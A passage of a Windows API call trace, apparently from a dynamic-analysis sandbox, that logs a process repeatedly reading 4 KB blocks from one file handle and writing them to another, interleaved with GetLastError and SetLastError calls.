[0095.864] GetLastError () returned 0x0 [0095.864] SetLastError (dwErrCode=0x0) [0095.864] GetLastError () returned 0x0 [0095.864] SetLastError (dwErrCode=0x0) [0095.864] GetLastError () returned 0x0 [0095.864] SetLastError (dwErrCode=0x0) [0095.864] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.864] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.864] GetLastError () returned 0x0 [0095.864] SetLastError (dwErrCode=0x0) [0095.864] GetLastError () returned 0x0 [0095.864] SetLastError (dwErrCode=0x0) [0095.864] GetLastError () returned 0x0 [0095.864] SetLastError (dwErrCode=0x0) [0095.864] GetLastError () returned 0x0 [0095.864] SetLastError (dwErrCode=0x0) [0095.864] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.865] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.865] GetLastError () returned 0x0 [0095.865] SetLastError (dwErrCode=0x0) [0095.865] GetLastError () returned 0x0 [0095.865] SetLastError (dwErrCode=0x0) [0095.865] GetLastError () returned 0x0 [0095.865] SetLastError (dwErrCode=0x0) [0095.865] GetLastError () returned 0x0 [0095.865] SetLastError (dwErrCode=0x0) [0095.865] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.058] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.058] GetLastError () returned 0x0 [0096.058] SetLastError (dwErrCode=0x0) [0096.058] GetLastError () returned 0x0 [0096.058] SetLastError (dwErrCode=0x0) [0096.058] GetLastError () returned 0x0 [0096.058] SetLastError (dwErrCode=0x0) [0096.058] GetLastError () returned 0x0 [0096.058] SetLastError (dwErrCode=0x0) [0096.058] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.059] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.059] GetLastError () returned 0x0 [0096.059] SetLastError (dwErrCode=0x0) [0096.059] GetLastError () returned 0x0 [0096.059] SetLastError (dwErrCode=0x0) [0096.059] GetLastError () returned 0x0 [0096.059] SetLastError (dwErrCode=0x0) [0096.059] GetLastError () returned 0x0 [0096.059] SetLastError (dwErrCode=0x0) [0096.059] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.059] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.059] GetLastError () returned 0x0 [0096.059] SetLastError (dwErrCode=0x0) [0096.059] GetLastError () returned 0x0 [0096.059] SetLastError (dwErrCode=0x0) [0096.059] GetLastError () returned 0x0 [0096.059] SetLastError (dwErrCode=0x0) [0096.060] GetLastError () returned 0x0 [0096.060] SetLastError (dwErrCode=0x0) [0096.060] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.060] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.060] GetLastError () returned 0x0 [0096.060] SetLastError (dwErrCode=0x0) [0096.060] GetLastError () returned 0x0 [0096.060] SetLastError (dwErrCode=0x0) [0096.060] GetLastError () returned 0x0 [0096.060] SetLastError (dwErrCode=0x0) [0096.060] GetLastError () returned 0x0 [0096.060] SetLastError (dwErrCode=0x0) [0096.060] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.060] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.060] GetLastError () returned 0x0 [0096.061] SetLastError (dwErrCode=0x0) [0096.061] GetLastError () returned 0x0 [0096.061] SetLastError (dwErrCode=0x0) [0096.061] GetLastError () returned 0x0 [0096.061] SetLastError (dwErrCode=0x0) [0096.061] GetLastError () returned 0x0 [0096.061] SetLastError (dwErrCode=0x0) [0096.061] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.061] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.061] GetLastError () returned 0x0 [0096.061] SetLastError (dwErrCode=0x0) [0096.061] GetLastError () returned 0x0 [0096.061] SetLastError (dwErrCode=0x0) [0096.061] GetLastError () returned 0x0 [0096.061] SetLastError (dwErrCode=0x0) [0096.061] GetLastError () returned 0x0 [0096.061] SetLastError (dwErrCode=0x0) [0096.061] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.061] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.062] GetLastError () returned 0x0 [0096.062] SetLastError (dwErrCode=0x0) [0096.062] GetLastError () returned 0x0 [0096.062] SetLastError (dwErrCode=0x0) [0096.062] GetLastError () returned 0x0 [0096.062] SetLastError (dwErrCode=0x0) [0096.062] GetLastError () returned 0x0 [0096.062] SetLastError (dwErrCode=0x0) [0096.062] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.062] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.062] GetLastError () returned 0x0 [0096.062] SetLastError (dwErrCode=0x0) [0096.062] GetLastError () returned 0x0 [0096.062] SetLastError (dwErrCode=0x0) [0096.062] GetLastError () returned 0x0 [0096.062] SetLastError (dwErrCode=0x0) [0096.062] GetLastError () returned 0x0 [0096.062] SetLastError (dwErrCode=0x0) [0096.062] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.063] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.063] GetLastError () returned 0x0 [0096.063] SetLastError (dwErrCode=0x0) [0096.063] GetLastError () returned 0x0 [0096.063] SetLastError (dwErrCode=0x0) [0096.063] GetLastError () returned 0x0 [0096.063] SetLastError (dwErrCode=0x0) [0096.063] GetLastError () returned 0x0 [0096.063] SetLastError (dwErrCode=0x0) [0096.063] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.063] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.063] GetLastError () returned 0x0 [0096.063] SetLastError (dwErrCode=0x0) [0096.063] GetLastError () returned 0x0 [0096.063] SetLastError (dwErrCode=0x0) [0096.063] GetLastError () returned 0x0 [0096.063] SetLastError (dwErrCode=0x0) [0096.063] GetLastError () returned 0x0 [0096.064] SetLastError (dwErrCode=0x0) [0096.064] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.064] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.064] GetLastError () returned 0x0 [0096.064] SetLastError (dwErrCode=0x0) [0096.064] GetLastError () returned 0x0 [0096.064] SetLastError (dwErrCode=0x0) [0096.064] GetLastError () returned 0x0 [0096.064] SetLastError (dwErrCode=0x0) [0096.064] GetLastError () returned 0x0 [0096.064] SetLastError (dwErrCode=0x0) [0096.064] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.064] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.064] GetLastError () returned 0x0 [0096.064] SetLastError (dwErrCode=0x0) [0096.064] GetLastError () returned 0x0 [0096.064] SetLastError (dwErrCode=0x0) [0096.065] GetLastError () returned 0x0 [0096.065] SetLastError (dwErrCode=0x0) [0096.065] GetLastError () returned 0x0 [0096.065] SetLastError (dwErrCode=0x0) [0096.065] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.065] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.065] GetLastError () returned 0x0 [0096.065] SetLastError (dwErrCode=0x0) [0096.065] GetLastError () returned 0x0 [0096.065] SetLastError (dwErrCode=0x0) [0096.065] GetLastError () returned 0x0 [0096.065] SetLastError (dwErrCode=0x0) [0096.065] GetLastError () returned 0x0 [0096.065] SetLastError (dwErrCode=0x0) [0096.065] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.065] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.066] GetLastError () returned 0x0 [0096.066] SetLastError (dwErrCode=0x0) [0096.066] GetLastError () returned 0x0 [0096.066] SetLastError (dwErrCode=0x0) [0096.066] GetLastError () returned 0x0 [0096.066] SetLastError (dwErrCode=0x0) [0096.066] GetLastError () returned 0x0 [0096.066] SetLastError (dwErrCode=0x0) [0096.066] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.066] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.066] GetLastError () returned 0x0 [0096.066] SetLastError (dwErrCode=0x0) [0096.066] GetLastError () returned 0x0 [0096.066] SetLastError (dwErrCode=0x0) [0096.066] GetLastError () returned 0x0 [0096.066] SetLastError (dwErrCode=0x0) [0096.066] GetLastError () returned 0x0 [0096.066] SetLastError (dwErrCode=0x0) [0096.066] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.066] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.067] GetLastError () returned 0x0 [0096.067] SetLastError (dwErrCode=0x0) [0096.067] GetLastError () returned 0x0 [0096.067] SetLastError (dwErrCode=0x0) [0096.067] GetLastError () returned 0x0 [0096.067] SetLastError (dwErrCode=0x0) [0096.067] GetLastError () returned 0x0 [0096.067] SetLastError (dwErrCode=0x0) [0096.067] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.067] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.068] GetLastError () returned 0x0 [0096.068] SetLastError (dwErrCode=0x0) [0096.068] GetLastError () returned 0x0 [0096.068] SetLastError (dwErrCode=0x0) [0096.068] GetLastError () returned 0x0 [0096.068] SetLastError (dwErrCode=0x0) [0096.069] GetLastError () returned 0x0 [0096.069] SetLastError (dwErrCode=0x0) [0096.069] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.069] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.069] GetLastError () returned 0x0 [0096.069] SetLastError (dwErrCode=0x0) [0096.069] GetLastError () returned 0x0 [0096.069] SetLastError (dwErrCode=0x0) [0096.069] GetLastError () returned 0x0 [0096.069] SetLastError (dwErrCode=0x0) [0096.069] GetLastError () returned 0x0 [0096.069] SetLastError (dwErrCode=0x0) [0096.069] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.069] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.069] GetLastError () returned 0x0 [0096.069] SetLastError (dwErrCode=0x0) [0096.069] GetLastError () returned 0x0 [0096.070] SetLastError (dwErrCode=0x0) [0096.070] GetLastError () returned 0x0 [0096.070] SetLastError (dwErrCode=0x0) [0096.070] GetLastError () returned 0x0 [0096.070] SetLastError (dwErrCode=0x0) [0096.070] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.070] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.071] GetLastError () returned 0x0 [0096.071] SetLastError (dwErrCode=0x0) [0096.071] GetLastError () returned 0x0 [0096.071] SetLastError (dwErrCode=0x0) [0096.071] GetLastError () returned 0x0 [0096.071] SetLastError (dwErrCode=0x0) [0096.071] GetLastError () returned 0x0 [0096.071] SetLastError (dwErrCode=0x0) [0096.071] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.071] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.071] GetLastError () returned 0x0 [0096.071] SetLastError (dwErrCode=0x0) [0096.071] GetLastError () returned 0x0 [0096.071] SetLastError (dwErrCode=0x0) [0096.071] GetLastError () returned 0x0 [0096.071] SetLastError (dwErrCode=0x0) [0096.071] GetLastError () returned 0x0 [0096.071] SetLastError (dwErrCode=0x0) [0096.071] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.072] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.072] GetLastError () returned 0x0 [0096.072] SetLastError (dwErrCode=0x0) [0096.072] GetLastError () returned 0x0 [0096.072] SetLastError (dwErrCode=0x0) [0096.072] GetLastError () returned 0x0 [0096.072] SetLastError (dwErrCode=0x0) [0096.072] GetLastError () returned 0x0 [0096.072] SetLastError (dwErrCode=0x0) [0096.072] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.072] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.072] GetLastError () returned 0x0 [0096.073] SetLastError (dwErrCode=0x0) [0096.073] GetLastError () returned 0x0 [0096.073] SetLastError (dwErrCode=0x0) [0096.073] GetLastError () returned 0x0 [0096.073] SetLastError (dwErrCode=0x0) [0096.073] GetLastError () returned 0x0 [0096.073] SetLastError (dwErrCode=0x0) [0096.073] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.073] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.073] GetLastError () returned 0x0 [0096.073] SetLastError (dwErrCode=0x0) [0096.073] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.073] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.073] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.074] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.074] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.074] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.074] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.074] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.075] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.075] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.075] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.075] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.075] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.075] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.076] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.076] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.076] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.076] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.076] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.077] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.077] ReadFile 